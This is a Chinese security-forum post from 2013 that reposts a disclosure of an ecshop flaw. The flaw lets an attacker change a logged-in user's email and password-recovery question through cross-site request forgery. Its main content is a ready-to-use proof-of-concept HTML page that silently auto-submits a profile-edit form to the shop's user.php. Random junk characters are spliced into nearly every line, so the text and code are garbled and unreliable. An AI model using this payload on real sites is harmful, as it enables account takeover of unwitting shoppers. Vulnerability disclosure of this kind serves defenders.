找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1935|回复: 0
打印 上一主题 下一主题

ecshop修改任意用户密码漏洞的CSRF利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-20 08:30:14 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:* H+ ]5 v0 V$ h2 e
ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现0 ?- y$ z0 w5 g4 f* u

3 r9 S) c4 O, ^  S- U1 KDemo For:http://www.wooyun.org/bug.php?action=view&id=395  R5 K5 B2 T* H8 L
$ E5 r* L3 V. c% r% M
详细说明:
5 P* f: p  N; _% T2 Q7 K利用csrf和xss可以突破官方所说的“障碍”+ ~$ V% Z$ P* i$ A* J5 H: Z$ T
xss版本已经有人说明& S: a+ G( O8 O, P; K
这里给出csrf版本
5 D4 W: ^* T# z6 @7 R# n$ r, O2 S! }% A$ W$ z5 f
漏洞证明:" r/ ?$ H5 n1 u* B& W4 F3 a. J3 l
<html>6 E; m. \/ B: E5 [
<body>1 ^* I$ G! F( H$ w0 e
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
1 C' v  {* w5 j# z; A; y4 t<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">& w6 c1 O% J: v$ G8 N
<INPUT TYPE="text" NAME="act" value="act_edit_profile">) G* k  i5 ]/ a& ?+ q
<INPUT TYPE="text" NAME="sel_question" value="ecshop">
4 N3 P; S4 o7 X6 A8 g# q<INPUT TYPE="text" NAME="passwd_answer" value="exploit">- V9 u; h8 s+ ?) j, `7 d% z' D4 W
</body>
$ m0 u! e0 P) [<script>$ K1 u' c! q& q  d0 {4 n
document.forms[0].submit();3 B% p3 J- A& k6 ~7 \
</script>* j0 ?' o& R# ]# |9 \
</html>( X' O. R7 f7 o$ P
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失1 Y: I$ e4 E; d9 c* e7 q
  M1 t' I4 R( H- @
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表